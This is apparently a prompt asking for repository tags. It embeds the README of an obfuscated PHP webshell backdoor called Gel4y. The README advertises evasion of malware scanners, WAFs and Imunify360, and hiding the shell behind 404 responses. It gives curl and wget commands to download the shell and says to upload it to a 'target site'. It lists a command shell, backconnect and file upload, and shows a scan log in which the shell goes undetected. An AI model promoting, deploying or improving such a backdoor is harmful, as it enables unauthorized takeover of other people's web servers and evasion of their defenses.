AI prompts
base on A webshell that can bypass some system security, all code has been obfuscated to bypass malware scans freely. <h2 align="center">Gel4y Mini Shell Backdoor</h2>
<p align="center">
<img src="https://img.shields.io/badge/PHP-7.4.3-blue">
<img src="https://img.shields.io/badge/LICENSE-MIT-lime">
<img src="https://img.shields.io/badge/Version-1.3.1-darkred">
</p>
Summary
----------
Gel4y Webshell is a backdoor built using the PHP programming language with the PHP procedural method in stealth mode where the file size is no more than 10KB, using the [nano shell](https://github.com/22XploiterCrew-Team/Shellmon) method so it can easily escape virus scanning. Every PHP function has been obfuscated to avoid some firewall systems (WAF) that block some PHP functions that are considered dangerous.
Now in the latest version of Gel4y the webshell will not be indexed by Google because the resulting status code is 404, this will make your webshell safe from being stolen by other hackers.
```
< HTTP/1.1 404 Not Found
< Host: localhost:1337
< Date: Wed, 06 Dec 2023 19:20:21 GMT
< Connection: close
< X-Powered-By: PHP/8.2.8
< Content-type: text/html; charset=UTF-8
```
### How To Use
You only need to download the files in this repo, there are several easy ways that you might try
* cURL
```curl https://raw.githubusercontent.com/22XploiterCrew-Team/Gel4y-Mini-Shell-Backdoor/1.x.x/gel4y.php -o gel4y.php```
* wget
```wget https://raw.githubusercontent.com/22XploiterCrew-Team/Gel4y-Mini-Shell-Backdoor/1.x.x/gel4y.php```
the method above will download and save to your computer, you only need to upload the webshell to the target site that you have and call it according to the name of the webshell file you downloaded.
ex: ***https://server.com/gel4y.php***.
> You can also combine it with [Shellmon](https://github.com/22XploiterCrew-Team/Shellmon).
Malware Scanning Log
--------
we have carried out a small check to find out whether this webshell can still be detected as malware or not, and the results we got are as follows;
```
[2023-12-03 18:55:10] [INFO] Scan date: 2023-12-03 18:55:10
[2023-12-03 18:55:10] [INFO] Scanning ~/Gel4y-Mini-Shell-Backdoor/gel4y.php
[2023-12-03 18:55:10] [INFO] Mapping and retrieving checksums, please wait
[2023-12-03 18:55:10] [INFO] Found 1 files to check
[2023-12-03 18:55:10] [INFO] Checking files
[2023-12-03 18:55:11] [SUCCESS] Scan finished!
[2023-12-03 18:55:11] [INFO] Files scanned: 1
[2023-12-03 18:55:11] [INFO] Files edited: 0
[2023-12-03 18:55:11] [INFO] Files quarantined: 0
[2023-12-03 18:55:11] [INFO] Files whitelisted: 0
[2023-12-03 18:55:11] [INFO] Files ignored: 0
[2023-12-03 18:55:11] [INFO] Malware detected: 0
[2023-12-03 18:55:11] [INFO] Malware removed: 0
```
The result obtained is that the webshell is not detected as "Malware Bailout".
Features [UPDATED]
--------
There are several features that may be very useful for executing on the server, we have only added important features that are commonly used to manage target files
* ***PHP BackConnect***
* ***Command Shell***
* ***Zip Upload (Auto Extract)***
* Obfuscated Code (not a feature in webshell)
* Multiple File Upload
* Create Folder and File
* File Download
a few features won't make this shell useless.
#### Bypassed
* 403 Forbidden
* 406 Not Acceptable (according to luck :>)
* Imunify360 (not always successful, only 85% chance of success)
we have done a little research on the code we wrote, in order to penetrate some system security which is always a problem for hackers out there.
Preview
-------
<img src="https://images2.imgbox.com/a6/a8/WmrE2IOI_o.jpg" width="800" height="550">
Using the well-known css framework, Bootstrap version 4, so that the resulting display will adjust to your platform or more often it is called a responsive display.
## Thank's To
Thank you for the support given, we got references in making this backdoor from our friends, including:
- IndoXploit
- Indosec
- Marijuana Shell
### !!!
If there is an error in this webshell, please contribute with us.
", Assign "at most 3 tags" to the expected json: {"id":"5854","tags":[]} "only from the tags list I provide: [{"id":77,"name":"3d"},{"id":89,"name":"agent"},{"id":17,"name":"ai"},{"id":54,"name":"algorithm"},{"id":24,"name":"api"},{"id":44,"name":"authentication"},{"id":3,"name":"aws"},{"id":27,"name":"backend"},{"id":60,"name":"benchmark"},{"id":72,"name":"best-practices"},{"id":39,"name":"bitcoin"},{"id":37,"name":"blockchain"},{"id":1,"name":"blog"},{"id":45,"name":"bundler"},{"id":58,"name":"cache"},{"id":21,"name":"chat"},{"id":49,"name":"cicd"},{"id":4,"name":"cli"},{"id":64,"name":"cloud-native"},{"id":48,"name":"cms"},{"id":61,"name":"compiler"},{"id":68,"name":"containerization"},{"id":92,"name":"crm"},{"id":34,"name":"data"},{"id":47,"name":"database"},{"id":8,"name":"declarative-gui "},{"id":9,"name":"deploy-tool"},{"id":53,"name":"desktop-app"},{"id":6,"name":"dev-exp-lib"},{"id":59,"name":"dev-tool"},{"id":13,"name":"ecommerce"},{"id":26,"name":"editor"},{"id":66,"name":"emulator"},{"id":62,"name":"filesystem"},{"id":80,"name":"finance"},{"id":15,"name":"firmware"},{"id":73,"name":"for-fun"},{"id":2,"name":"framework"},{"id":11,"name":"frontend"},{"id":22,"name":"game"},{"id":81,"name":"game-engine "},{"id":23,"name":"graphql"},{"id":84,"name":"gui"},{"id":91,"name":"http"},{"id":5,"name":"http-client"},{"id":51,"name":"iac"},{"id":30,"name":"ide"},{"id":78,"name":"iot"},{"id":40,"name":"json"},{"id":83,"name":"julian"},{"id":38,"name":"k8s"},{"id":31,"name":"language"},{"id":10,"name":"learning-resource"},{"id":33,"name":"lib"},{"id":41,"name":"linter"},{"id":28,"name":"lms"},{"id":16,"name":"logging"},{"id":76,"name":"low-code"},{"id":90,"name":"message-queue"},{"id":42,"name":"mobile-app"},{"id":18,"name":"monitoring"},{"id":36,"name":"networking"},{"id":7,"name":"node-version"},{"id":55,"name":"nosql"},{"id":57,"name":"observability"},{"id":46,"name":"orm"},{"id":52,"name":"os"},{"id":14,"name":"parser"},{"id":74,"name":"react"},{"id":82,"name":"real-time"},{"id":56,"name":"robot"},{"id":65,"name":"runtime"},{"id":32,"name":"sdk"},{"id":71,"name":"search"},{"id":63,"name":"secrets"},{"id":25,"name":"security"},{"id":85,"name":"server"},{"id":86,"name":"serverless"},{"id":70,"name":"storage"},{"id":75,"name":"system-design"},{"id":79,"name":"terminal"},{"id":29,"name":"testing"},{"id":12,"name":"ui"},{"id":50,"name":"ux"},{"id":88,"name":"video"},{"id":20,"name":"web-app"},{"id":35,"name":"web-server"},{"id":43,"name":"webassembly"},{"id":69,"name":"workflow"},{"id":87,"name":"yaml"}]" returns me the "expected json"